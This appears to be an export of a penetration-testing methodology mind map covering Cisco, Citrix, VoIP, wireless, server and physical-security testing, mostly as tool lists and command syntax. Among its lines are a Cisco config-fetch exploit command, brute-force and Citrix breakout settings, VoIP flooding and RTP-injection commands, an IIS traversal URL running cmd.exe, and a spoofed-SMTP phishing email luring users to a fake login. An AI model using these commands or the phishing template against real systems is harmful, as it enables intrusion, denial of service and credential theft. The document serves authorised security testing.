21.5.4.1.1. Untitled

21.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names.

21.5.4.2. Untitled

21.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>

21.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>

21.5.4.2.3. Creating backdoors in Cisco IOS using TCL

21.6. Known Bugs.

21.6.1. Attack Tools

21.6.1.1. Untitled

21.6.1.1.1. Untitled

21.6.1.2. Untitled

21.6.1.2.1. Web browse to the Cisco device: http://<IP>

21.6.1.2.2. Untitled

21.6.1.2.3. Untitled

21.6.1.2.4. Untitled

21.6.1.3. Untitled

21.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt

21.6.2. Common Vulnerabilities and Exploits (CVE) Information

21.6.2.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS

21.7. Configuration Files.

21.7.1. Untitled

21.7.1.1. Configuration files explained

21.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password, which is superseded by the enable secret password for remote access.

21.7.1.1.2. Untitled

21.7.1.1.3. Untitled

21.7.1.1.4. Password Encryption Utilised

21.7.1.1.5. Untitled

21.7.1.2. Configuration Testing Tools

21.7.1.2.1. Nipper

21.7.1.2.2. fwauto (Beta)

21.8. References.

21.8.1. Cisco IOS Exploitation Techniques

22. Citrix Specific Testing

22.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information has been put together to help you conduct a vulnerability assessment/penetration test against Citrix.

22.2. Enumeration

22.2.1. web search

22.2.1.1. Google (GHDB)

22.2.1.1.1. ext:ica

22.2.1.1.2. inurl:citrix/metaframexp/default/login.asp

22.2.1.1.3. [WFClient] Password= filetype:ica

22.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On

22.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"

22.2.1.1.6. inurl:/Citrix/Nfuse17/

22.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx

22.2.1.2. Google Hacks (Author Discovered)

22.2.1.2.1. filetype:ica Username=

22.2.1.2.2. inurl:/Citrix/AccessPlatform/

22.2.1.2.3. inurl:LogonAgent/Login.asp

22.2.1.2.4. inurl:/CITRIX/NFUSE/default/login.asp

22.2.1.2.5. inurl:/Citrix/NFuse161/login.asp

22.2.1.2.6. inurl:/Citrix/NFuse16

22.2.1.2.7. inurl:/Citrix/NFuse151/

22.2.1.2.8. allintitle:MetaFrame XP Login

22.2.1.2.9. allintitle:MetaFrame Presentation Server Login

22.2.1.2.10. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On

22.2.1.2.11. allintitle:Citrix(R) NFuse(TM) Classic Login

22.2.1.3. Yahoo

22.2.1.3.1. originurlextension:ica

22.2.2. site search

22.2.2.1. Manual

22.2.2.1.1. review web page for useful information

22.2.2.1.2. review source for web page

22.2.3. generic

22.2.3.1. nmap -A -PN -p 80,443,1494 ip_address

22.2.3.2. amap -bqv ip_address port_no.

22.2.4. citrix specific

22.2.4.1. enum.pl

22.2.4.1.1. perl enum.pl ip_address

22.2.4.2. enum.js

22.2.4.2.1. enum.js apps TCPBrowserAddress=ip_address

22.2.4.3. connect.js

22.2.4.3.1. connect.js TCPBrowserAddress=ip_address Application=advertised-application

22.2.4.4. Citrix-pa-scan

22.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri

22.2.4.5. pabrute.c

22.2.4.5.1. ./pabrute pubapp list app_list ip_address

22.2.5. Default Ports

22.2.5.1. TCP

22.2.5.1.1. Citrix XML Service

22.2.5.1.2. Advanced Management Console

22.2.5.1.3. Citrix SSL Relay

22.2.5.1.4. ICA sessions

22.2.5.1.5. Server to server

22.2.5.1.6. Management Console to server

22.2.5.1.7. Session Reliability (Auto-reconnect)

22.2.5.1.8. License Management Console

22.2.5.1.9. License server

22.2.5.2. UDP

22.2.5.2.1. Clients to ICA browser service

22.2.5.2.2. Server-to-server

22.2.6. nmap nse scripts

22.2.6.1. citrix-enum-apps

22.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>

22.2.6.2. citrix-enum-apps-xml

22.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>

22.2.6.3. citrix-enum-servers

22.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604 <host>

22.2.6.4. citrix-enum-servers-xml

22.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>

22.2.6.5. citrix-brute-xml

22.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

22.3. Scanning

22.3.1. Nessus

22.3.1.1. Plugins

22.3.1.1.1. CGI abuses

22.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)

22.3.1.1.3. Misc.

22.3.1.1.4. Service Detection

22.3.1.1.5. Web Servers

22.3.1.1.6. Windows

22.3.2. Nikto

22.3.2.1. perl nikto.pl -host ip_address -port port_no.

22.3.2.1.1. Untitled

22.4. Exploitation

22.4.1. Alter default .ica files

22.4.1.1. InitialProgram=cmd.exe

22.4.1.2. InitialProgram=explorer.exe

22.4.2. Enumerate and Connect

22.4.2.1. For applications identified by Citrix-pa-scan

22.4.2.1.1. Pas

22.4.2.2. For published applications with a Citrix client when the master browser is non-public.

22.4.2.2.1. Citrix-pa-proxy

22.5. Brute Force

22.5.1. bforce.js

22.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2

22.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

22.5.1.3. Untitled

22.6. Review Configuration Files

22.6.1. Application server configuration file

22.6.1.1. appsrv.ini

22.6.1.1.1. Location

22.6.1.1.2. World writeable

22.6.1.1.3. Review other files

22.6.1.1.4. Sample file

22.6.2. Program Neighborhood configuration file

22.6.2.1. pn.ini

22.6.2.1.1. Location

22.6.2.1.2. Review other files

22.6.2.1.3. Sample file

22.6.3. Citrix ICA client configuration file

22.6.3.1. wfclient.ini

22.6.3.1.1. Location

22.7. References

22.7.1. Vulnerabilities

22.7.1.1. Art of Hacking

22.7.1.2. Common Vulnerabilities and Exploits (CVE)

22.7.1.2.1. Sample file

22.7.1.2.2. Untitled

22.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix

22.7.1.3. OSVDB

22.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=search

22.7.1.4. Secunia

22.7.1.5. Security-database.com

22.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix

22.7.1.6. SecurityFocus

22.7.2. Support

22.7.2.1. Citrix

22.7.2.1.1. Knowledge Base

22.7.2.2. Thinworld

22.7.3. Exploits

22.7.3.1. Milw0rm

22.7.3.1.1. http://www.milw0rm.com/search.php

22.7.3.2. Art of Hacking

22.7.3.2.1. Citrix

22.7.4. Tools Resource

22.7.4.1. Zip file containing the majority of the tools mentioned in this article, for easy download/access

23. Network Backbone

23.1. Generic Toolset

23.1.1. Wireshark (Formerly Ethereal)

23.1.1.1. Passive Sniffing

23.1.1.1.1. Usernames/Passwords

23.1.1.1.2. Email

23.1.1.1.3. FTP

23.1.1.1.4. HTTP

23.1.1.1.5. HTTPS

23.1.1.1.6. RDP

23.1.1.1.7. VOIP

23.1.1.1.8. Other

23.1.1.2. Filters

23.1.1.2.1. ip.src == ip_address

23.1.1.2.2. ip.dst == ip_address

23.1.1.2.3. tcp.dstport == port_no.

23.1.1.2.4. ! ip.addr == ip_address

23.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

23.1.2. Cain & Abel

23.1.2.1. Active Sniffing

23.1.2.1.1. ARP Cache Poisoning

23.1.2.1.2. DNS Poisoning

23.1.2.1.3. Routing Protocols

23.1.3. Cisco-Torch

23.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>

23.1.4. NTP-Fingerprint

23.1.4.1. perl ntp-fingerprint.pl -t [ip_address]

23.1.5. Yersinia

23.1.6. p0f

23.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

23.1.7. Manual Check (Credentials required)

23.1.8. MAC Spoofing

23.1.8.1. mac address changer for windows

23.1.8.2. macchanger

23.1.8.2.1. Random Mac Address:- macchanger -r eth0

23.1.8.3. madmacs

23.1.8.4. smac

23.1.8.5. TMAC

24. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that, if used, could lead to privilege escalation or denial of service against the computer system being attacked. Exploits can be compiled and used manually, or various engines exist that are essentially, at the lowest level, pre-compiled point-and-shoot tools. These engines also have a number of other underlying features for more advanced users.

24.1. Password Attacks

24.1.1. Known Accounts

24.1.1.1. Identified Passwords

24.1.1.2. Unidentified Hashes

24.1.2. Default Accounts

24.1.2.1. Identified Passwords

24.1.2.2. Unidentified Hashes

24.2. Exploits

24.2.1. Successful Exploits

24.2.1.1. Accounts

24.2.1.1.1. Passwords

24.2.1.1.2. Groups

24.2.1.1.3. Other Details

24.2.1.2. Services

24.2.1.3. Backdoor

24.2.1.4. Connectivity

24.2.2. Unsuccessful Exploits

24.2.3. Resources

24.2.3.1. Securiteam

24.2.3.1.1. Exploits are sorted by year and must be downloaded individually

24.2.3.2. SecurityForest

24.2.3.2.1. Updated via CVS after initial install

24.2.3.3. GovernmentSecurity

24.2.3.3.1. Need to create an account to obtain access

24.2.3.4. Red Base Security

24.2.3.4.1. Oracle Exploit site only

24.2.3.5. Wireless Vulnerabilities & Exploits (WVE)

24.2.3.5.1. Wireless Exploit Site

24.2.3.6. PacketStorm Security

24.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.

24.2.3.7. SecWatch

24.2.3.7.1. Exploits sorted by year and month, download separately

24.2.3.8. SecurityFocus

24.2.3.8.1. Exploits must be downloaded individually

24.2.3.9. Metasploit

24.2.3.9.1. Install and regularly update via svn

24.2.3.10. Milw0rm

24.2.3.10.1. Exploit archive indexed and sorted by port, downloadable as a whole - The one to go for!

24.3. Tools

24.3.1. Metasploit

24.3.1.1. Free Extra Modules

24.3.1.1.1. local copy

24.3.2. Manual SQL Injection

24.3.2.1. Understanding SQL Injection

24.3.2.2. SQL Injection walkthrough

24.3.2.3. SQL Injection by example

24.3.2.4. Blind SQL Injection

24.3.2.5. Advanced SQL Injection in SQL Server

24.3.2.6. More Advanced SQL Injection

24.3.2.7. Advanced SQL Injection in Oracle databases

24.3.2.8. SQL Cheatsheets

24.3.2.8.1. Untitled

24.3.3. SQL Power Injector

24.3.4. SecurityForest

24.3.5. SPI Dynamics WebInspect

24.3.6. Core Impact

24.3.7. Cisco Global Exploiter

24.3.8. PIXDos

24.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]

24.3.9. CANVAS

24.3.10. Inguma

25. Server Specific Tests

25.1. Databases

25.1.1. Direct Access Interrogation

25.1.1.1. MS SQL Server

25.1.1.1.1. Ports

25.1.1.1.2. Version

25.1.1.1.3. osql

25.1.1.2. Oracle

25.1.1.2.1. Ports

25.1.1.2.2. TNS Listener

25.1.1.2.3. SQL Plus

25.1.1.2.4. Default Account/Passwords

25.1.1.2.5. Default SID's

25.1.1.3. MySQL

25.1.1.3.1. Ports

25.1.1.3.2. Version

25.1.1.3.3. Users/Passwords

25.1.1.4. DB2

25.1.1.5. Informix

25.1.1.6. Sybase

25.1.1.7. Other

25.1.2. Scans

25.1.2.1. Default Ports

25.1.2.2. Non-Default Ports

25.1.2.3. Instance Names

25.1.2.4. Versions

25.1.3. Password Attacks

25.1.3.1. Sniffed Passwords

25.1.3.1.1. Cracked Passwords

25.1.3.1.2. Hashes

25.1.3.2. Direct Access Guesses

25.1.4. Vulnerability Assessment

25.1.4.1. Automated

25.1.4.1.1. Reports

25.1.4.1.2. Vulnerabilities

25.1.4.2. Manual

25.1.4.2.1. Patch Levels

25.1.4.2.2. Confirmed Vulnerabilities

25.2. Mail

25.2.1. Scans

25.2.2. Fingerprint

25.2.2.1. Manual

25.2.2.2. Automated

25.2.3. Spoofable

25.2.3.1. Telnet spoof

25.2.3.1.1. telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target [email protected]

25.2.4. Relays

25.3. VPN

25.3.1. Scanning

25.3.1.1. 500 UDP IPSEC

25.3.1.2. 1723 TCP PPTP

25.3.1.3. 443 TCP/SSL

25.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27

25.3.1.5. ipsecscan 80.75.68.22 80.75.68.27

25.3.2. Fingerprinting

25.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27

25.3.3. PSK Crack

25.3.3.1. ikeprobe 80.75.68.27

25.3.3.2. sniff for responses with C&A or ikecrack

25.4. Web

25.4.1. Vulnerability Assessment

25.4.1.1. Automated

25.4.1.1.1. Reports

25.4.1.1.2. Vulnerabilities

25.4.1.2. Manual

25.4.1.2.1. Patch Levels

25.4.1.2.2. Confirmed Vulnerabilities

25.4.2. Permissions

25.4.2.1. PUT /test.txt HTTP/1.0

25.4.2.2. CONNECT mail.another.com:25 HTTP/1.0

25.4.2.3. POST http://mail.another.com:25/ HTTP/1.0
Content-Type: text/plain
Content-Length: 6

25.4.3. Scans

25.4.4. Fingerprinting

25.4.4.1. Other

25.4.4.2. HTTP

25.4.4.2.1. Commands

25.4.4.2.2. Modules

25.4.4.2.3. File Extensions

25.4.4.3. HTTPS

25.4.4.3.1. Commands

25.4.4.3.2. Commands

25.4.4.3.3. File Extensions

25.4.5. Directory Traversal

25.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

26. VoIP Security

26.1. Sniffing Tools

26.1.1. AuthTool

26.1.2. Cain & Abel

26.1.3. Etherpeek

26.1.4. NetDude

26.1.5. Oreka

26.1.6. PSIPDump

26.1.7. SIPomatic

26.1.8. SIPv6 Analyzer

26.1.9. UCSniff

26.1.10. VoiPong

26.1.11. VOMIT

26.1.12. Wireshark

26.1.13. WIST - Web Interface for SIP Trace

26.2. Scanning and Enumeration Tools

26.2.1. enumIAX

26.2.2. fping

26.2.3. IAX Enumerator

26.2.4. iWar

26.2.5. Nessus

26.2.6. Nmap

26.2.7. SIP Forum Test Framework (SFTF)

26.2.8. SIPcrack

26.2.9. sipflanker

26.2.9.1. python sipflanker.py 192.168.1-254

26.2.10. SIP-Scan

26.2.11. SIP.Tastic

26.2.12. SIPVicious

26.2.13. SiVuS

26.2.14. SMAP

26.2.14.1. smap IP_Address/Subnet_Mask

26.2.14.2. smap -o IP_Address/Subnet_Mask

26.2.14.3. smap -l IP_Address

26.2.15. snmpwalk

26.2.16. VLANping

26.2.17. VoIPAudit

26.2.18. VoIP GHDB Entries

26.2.19. VoIP Voicemail Database

26.3. Packet Creation and Flooding Tools

26.3.1. H.323 Injection Files

26.3.2. H225regreject

26.3.3. IAXHangup

26.3.4. IAXAuthJack

26.3.5. IAX.Brute

26.3.6. IAXFlooder

26.3.6.1. ./iaxflood sourcename destinationname numpackets

26.3.7. INVITE Flooder

26.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets

26.3.8. kphone-ddos

26.3.9. RTP Flooder

26.3.10. rtpbreak

26.3.11. Scapy

26.3.12. Seagull

26.3.13. SIPBomber

26.3.14. SIPNess

26.3.15. SIPp

26.3.16. SIPsak

26.3.16.1. Tracing paths: sipsak -T -s sip:[email protected]

26.3.16.2. Options request: sipsak -vv -s sip:[email protected]

26.3.16.3. Query registered bindings: sipsak -I -C empty -a password -s sip:[email protected]

26.3.17. SIP-Send-Fun

26.3.18. SIPVicious

26.3.19. Spitter

26.3.20. TFTP Brute Force

26.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>

26.3.21. UDP Flooder

26.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

26.3.22. UDP Flooder (with VLAN Support)

26.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

26.3.23. Voiphopper

26.4. Fuzzing Tools

26.4.1. Asteroid

26.4.2. Codenomicon VoIP Fuzzers

26.4.3. Fuzzy Packet

26.4.4. Mu Security VoIP Fuzzing Platform

26.4.5. ohrwurm RTP Fuzzer

26.4.6. PROTOS H.323 Fuzzer

26.4.7. PROTOS SIP Fuzzer

26.4.8. SIP Forum Test Framework (SFTF)

26.4.9. Sip-Proxy

26.5. Signaling Manipulation Tools

26.5.1. AuthTool

26.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

26.5.2. BYE Teardown

26.5.3. Check Sync Phone Rebooter

26.5.4. RedirectPoison

26.5.5. Registration Adder

26.5.6. Registration Eraser

26.5.7. Registration Hijacker

26.5.8. SIP-Kill

26.5.9. SIP-Proxy-Kill

26.5.10. SIP-RedirectRTP

26.5.11. vnak

26.6. Media Manipulation Tools

26.6.1. RTP InsertSound

26.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

26.6.2. RTP MixSound

26.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

26.6.3. RTPProxy

26.6.4. RTPInject

26.7. Generic Software Suites

26.7.1. OAT Office Communication Server Tool Assessment

26.7.2. EnableSecurity VOIPPACK

26.7.2.1. Note: add-on for Immunity Canvas

26.8. References

26.8.1. URLs

26.8.1.1. Common Vulnerabilities and Exploits (CVE)

26.8.1.1.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip

26.8.1.2. Default Passwords

26.8.1.3. Hacking Exposed VoIP

26.8.1.3.1. Tool Pre-requisites

26.8.1.4. VoIPsa

26.8.2. White Papers

26.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems

26.8.2.2. An Analysis of VoIP Security Threats and Tools

26.8.2.3. Hacking VoIP Exposed

26.8.2.4. Security testing of SIP implementations

26.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks

26.8.2.6. Two attacks against VoIP

26.8.2.7. VoIP Attacks!

26.8.2.8. VoIP Security Audit Program (VSAP)

26.8.3. Spirent ThreatEx

27. Wireless Penetration

27.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All of this information is needed to give the tester (and hence the customer) a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry out the assessment.

27.1.1. Site Map

27.1.1.1. RF Map

27.1.1.1.1. Lines of Sight

27.1.1.1.2. Signal Coverage

27.1.1.2. Physical Map

27.1.1.2.1. Triangulate APs

27.1.1.2.2. Satellite Imagery

27.1.2. Network Map

27.1.2.1. MAC Filter

27.1.2.1.1. Authorised MAC Addresses

27.1.2.1.2. Reaction to Spoofed MAC Addresses

27.1.2.2. Encryption Keys utilised

27.1.2.2.1. WEP

27.1.2.2.2. WPA/PSK

27.1.2.2.3. 802.1x

27.1.2.3. Access Points

27.1.2.3.1. ESSID

27.1.2.3.2. BSSIDs

27.1.2.4. Wireless Clients

27.1.2.4.1. MAC Addresses

27.1.2.4.2. Intercepted Traffic

27.2. SipRogue

27.3. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"

27.4. Wireless Toolkit

27.4.1. Wireless Discovery

27.4.1.1. Aerosol

27.4.1.2. Airfart

27.4.1.3. Aphopper

27.4.1.4. Apradar

27.4.1.5. BAFFLE

27.4.1.6. inSSIDer

27.4.1.7. iWEPPro

27.4.1.8. karma

27.4.1.9. KisMAC-ng

27.4.1.10. Kismet

27.4.1.11. MiniStumbler

27.4.1.12. Netstumbler

27.4.1.13. Vistumbler

27.4.1.14. Wellenreiter

27.4.1.15. Wifi Hopper

27.4.1.16. WirelessMon

27.4.1.17. WiFiFoFum

27.4.2. Packet Capture

27.4.2.1. Airopeek

27.4.2.2. Airpcap

27.4.2.3. Airtraf

27.4.2.4. Apsniff

27.4.2.5. Cain

27.4.2.6. Commview

27.4.2.7. Ettercap

27.4.2.8. Netmon

27.4.2.8.1. nmwifi

27.4.2.9. Wireshark

27.4.3. EAP Attack tools

27.4.3.1. eapmd5pass

27.4.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump

27.4.4. Leap Attack Tools

27.4.4.1. asleap

27.4.4.2. thc leap cracker

27.4.4.3. anwrap

27.4.5. WEP/ WPA Password Attack Tools

27.4.5.1. Airbase

27.4.5.2. Aircrack-ptw

27.4.5.3. Aircrack-ng

27.4.5.4. Airsnort

27.4.5.5. cowpatty

27.4.5.6. FiOS Wireless Key Calculator

27.4.5.7. iWifiHack

27.4.5.8. KisMAC-ng

27.4.5.9. Rainbow Tables

27.4.5.10. wep attack

27.4.5.11. wep crack

27.4.5.12. wzcook

27.4.6. Frame Generation Software

27.4.6.1. Airgobbler

27.4.6.2. airpwn

27.4.6.3. Airsnarf

27.4.6.4. Commview

27.4.6.5. fake ap

27.4.6.6. void 11

27.4.6.7. wifi tap

27.4.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

27.4.6.8. FreeRADIUS - Wireless Pwnage Edition

27.4.7. Mapping Software

27.4.7.1. Online Mapping

27.4.7.1.1. WIGLE

27.4.7.1.2. Skyhook

27.4.7.2. Tools

27.4.7.2.1. Knsgem

27.4.8. File Format Conversion Tools

27.4.8.1. ns1 recovery and conversion tool

27.4.8.2. warbable

27.4.8.3. warkizniz

27.4.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]

27.4.8.4. ivstools

27.4.9. IDS Tools

27.4.9.1. WIDZ

27.4.9.2. War Scanner

27.4.9.3. Snort-Wireless

27.4.9.4. AirDefense

27.4.9.5. AirMagnet

27.5. WLAN discovery

27.5.1. Unencrypted WLAN

27.5.1.1. Visible SSID

27.5.1.1.1. Sniff for IP range

27.5.1.2. Hidden SSID

27.5.1.2.1. Deauth client

27.5.2. WEP encrypted WLAN

27.5.2.1. Visible SSID

27.5.2.1.1. WEPattack

27.5.2.2. Hidden SSID

27.5.2.2.1. Deauth client

27.5.3. WPA / WPA2 encrypted WLAN

27.5.3.1. Deauth client

27.5.3.1.1. Capture EAPOL handshake

27.5.4. LEAP encrypted WLAN

27.5.4.1. Deauth client

27.5.4.1.1. Break LEAP

27.5.5. 802.1x WLAN

27.5.5.1. Create Rogue Access Point

27.5.5.1.1. Airsnarf

27.5.5.1.2. fake ap

27.5.5.1.3. Hotspotter

27.5.5.1.4. Karma

27.5.5.1.5. Linux rogue AP

27.5.6. Resources

27.5.6.1. URLs

27.5.6.1.1. Wirelessdefence.org

27.5.6.1.2. Russix

27.5.6.1.3. Wardrive.net

27.5.6.1.4. Wireless Vulnerabilities and Exploits (WVE)

27.5.6.2. White Papers

27.5.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4

27.5.6.2.2. 802.11b Firmware-Level Attacks

27.5.6.2.3. Wireless Attacks from an Intrusion Detection Perspective

27.5.6.2.4. Implementing a Secure Wireless Network for a Windows Environment

27.5.6.2.5. Breaking 104 bit WEP in less than 60 seconds

27.5.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz

27.5.6.2.7. Active behavioral fingerprinting of wireless devices

27.5.6.3. Common Vulnerabilities and Exploits (CVE)

27.5.6.3.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless

28. Physical Security

28.1. Building Security

28.1.1. Meeting Rooms

28.1.1.1. Check for active network jacks.

28.1.1.2. Check for any information in room.

28.1.2. Lobby

28.1.2.1. Check for active network jacks.

28.1.2.2. Does receptionist/guard leave lobby?

28.1.2.3. Accessible printers? Print test page.

28.1.2.4. Obtain phone/personnel listing.

28.1.3. Communal Areas

28.1.3.1. Check for active network jacks.

28.1.3.2. Check for any information in room.

28.1.3.3. Listen for employee conversations.

28.1.4. Room Security

28.1.4.1. Resistance of lock to picking.

28.1.4.1.1. What types of locks are used in the building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors?

28.1.4.2. Ceiling access areas.

28.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

28.1.5. Windows

28.1.5.1. Check windows/doors for visible intruder alarm sensors.

28.1.5.2. Check visible areas for sensitive information.

28.1.5.3. Can you video users logging on?

28.2. Perimeter Security

28.2.1. Fence Security

28.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.

28.2.2. Exterior Doors

28.2.2.1. If there is no perimeter fence, then determine if exterior doors are secured, guarded and monitored, etc.

28.2.3. Guards

28.2.3.1. Patrol Routines

28.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.

28.2.3.2. Communications

28.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physical intrusion.

28.3. Entry Points

28.3.1. Guarded Doors

28.3.1.1. Piggybacking

28.3.1.1.1. Attempt to closely follow employees into the building without having to show valid credentials.

28.3.1.2. Fake ID

28.3.1.2.1. Attempt to use fake ID to gain access.

28.3.1.3. Access Methods

28.3.1.3.1. Test 'out of hours' entry methods

28.3.2. Unguarded Doors

28.3.2.1. Identify all unguarded entry points.

28.3.2.1.1. Are doors secured?

28.3.2.1.2. Check locks for resistance to lock picking.

28.3.3. Windows

28.3.3.1. Check windows/doors for visible intruder alarm sensors.

28.3.3.1.1. Attempt to bypass sensors.

28.4. Office Waste

28.4.1. Dumpster Diving. Attempt to retrieve any useful information from ToE refuse. This may include: printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs, etc.

29. Final Report - template

30. Contributors

30.1. Matt Byrne (WirelessDefence.org)

30.1.1. Matt contributed the majority of the Wireless section.

30.2. Arvind Doraiswamy (Paladion.net)

30.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

30.3. Lee Lawson (Dns.co.uk)

30.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

30.4. Nabil OUCHN (Security-database.com)